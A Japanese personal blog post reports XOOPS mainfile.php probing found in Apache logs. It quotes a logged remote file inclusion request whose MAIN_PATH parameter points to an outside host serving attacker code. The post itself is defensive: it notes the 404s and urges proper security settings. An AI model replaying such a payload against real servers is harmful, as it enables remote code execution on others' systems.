Categories: XOOPS

mainfile.php狙いの不正アクセス。

 今日は,寒かった。昨日から南に見える例のお山は雪を頂いていたが,今朝は北に見える山も雪を被っていた。初雪である。まぁ,家の辺まで降ったわけではありませんが……

 ところで,12月5日にXOOPSを導入して以来,mainfile.php狙いの不正アクセスがApacheのログに多く記録されている。
mainfile.php?MAIN_PATH=http://www.all3c.com///images/mono/20100907/app/functions/response.txt?
mainfile.php?id
なんちゃらで,libwww-perlを利用したものである。自鯖にはmainfile.phpはないので,すべて404エラーになっている。@PAGESのほうではまだアクセスログを見ていないので分からないが,やっぱりmainfile.phpは有名な名前なんだね。

 MoovableTypeでも,WordPressでもコンフィグを狙うアクセスは多いけど,有名どころのアプリをそのままの名で設置するときは,指示されているセキュリティ関係のオプションはきっちりやらないと危ないよ。

 ところで,aguse.jp越えで h ttp://www.all3c.com///images/mono/20100907/app/functions/response.txt? にアクセスしたら,右の画像が表示された。カスペルスキー,えらい。

o6asan

Share
Published by
o6asan

Recent Posts

超手抜き、レンチン・ミキサー芋羊羹。

この秋よく作った芋羊羹のレシピ…

1年 ago

うー、久々にハマった。

 MariaDB の LTS …

2年 ago

あけましておめでとうございます。

ウサギ年ですねぇ。景気よく跳ね…

2年 ago

docomo の SC-02H 、 SIM ロック解除して Y!mobile で使う。

我が2台目のスマホとして SC…

3年 ago

o6asanの掲示板を引っ越し。-2

箱の準備が終わったので、中身を…

3年 ago

This website uses cookies.